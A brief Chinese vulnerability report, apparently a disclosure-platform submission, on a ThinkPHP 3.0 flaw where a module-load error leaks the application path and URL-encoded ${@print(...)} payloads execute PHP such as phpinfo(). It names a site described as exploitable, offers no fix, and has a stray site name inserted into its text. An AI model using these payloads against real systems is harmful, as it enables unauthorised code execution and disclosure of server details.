1. thinkphp3.0 模块加载失败,涛涛电脑知识网,出错信息爆应用程序路径。
漏洞证明:检测有两种情况
1. 可执行命令,涛涛电脑知识网,这个估计是伪3.0版本?
交大定票
此站到可以执行命令
$%7B@print(THINK_VERSION)%7D
可查看版本
$%7B@print(phpinfo())%7D
可查看phpinfo信息
2. 不可执行命令,爆路径
$%7B@print(phpinfo())%7D
$%7B@print(THINK_VERSION)%7D
$%7B@print(THINK_VERSION)%7D
修复方案:
这个不知道咋修复~~~
作者 dyun